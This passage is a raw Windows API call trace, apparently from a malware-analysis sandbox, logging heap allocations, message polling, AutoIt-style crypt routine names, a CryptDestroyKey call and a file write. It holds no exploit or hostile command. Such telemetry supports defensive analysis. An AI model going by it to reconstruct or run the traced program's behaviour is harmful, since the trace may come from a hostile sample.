RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0226.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0226.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0226.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0226.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0226.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551e8 [0226.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55278 [0226.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552f8 [0226.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0226.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55158 [0226.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.819] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0226.820] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0226.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0226.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0226.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0226.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0226.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0226.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0226.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0226.820] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0226.820] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0226.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0226.821] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0226.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0226.821] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0226.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0226.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0226.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0226.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0226.821] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0226.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0226.821] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0226.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0226.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0226.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0226.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0226.822] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0226.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0226.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0226.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0226.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0226.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0226.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0226.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0226.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0226.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0226.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0226.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0226.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511d8 [0226.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0226.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0226.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0226.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511c0 [0226.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0226.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0226.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0226.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0226.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0226.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0226.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0226.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0226.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0226.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f4e0 | out: hHeap=0x970000) returned 1 [0226.823] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0226.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0226.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0226.823] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0226.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0226.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0226.823] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0226.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0226.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0226.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0226.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0226.824] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0226.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0226.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0226.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0226.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0226.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0226.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0226.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0226.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0226.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0226.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0226.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0226.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0226.824] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0226.824] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0226.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0226.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0226.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0226.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0226.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0226.827] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.828] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0226.828] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.828] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0x4f98, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0x4f98, lpOverlapped=0x0) returned 1 [0226.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0226.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0226.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0226.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0226.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0226.831] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.831] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0226.831] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0226.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04348 | out: hHeap=0x970000) returned 1 [0226.831] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0226.831] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0226.832] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0226.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f046c8 | out: hHeap=0x970000) returned 1 [0226.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.832] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0226.832] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0226.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0226.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51220, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0226.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0226.832] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0226.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0226.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0226.832] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0226.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0226.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0226.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0226.833] CryptDestroyKey (hKey=0xa87650) returned 1 [0226.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0226.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0226.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0226.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0226.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0226.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0226.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0226.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0226.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0226.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0226.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0226.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0226.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0226.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0226.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0226.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0226.834] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0226.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0226.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0226.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0226.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0226.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0226.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0226.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0226.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0226.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0226.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0226.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0226.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0226.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0226.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0226.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0226.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0226.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0226.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0226.835] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0226.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0226.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0226.835] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0226.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0226.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0226.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0226.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0226.835] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0226.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0226.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0226.836] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0226.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0226.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0226.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0226.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0226.836] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0226.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0226.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0226.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0226.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0226.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0226.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0226.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0226.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0226.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0226.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 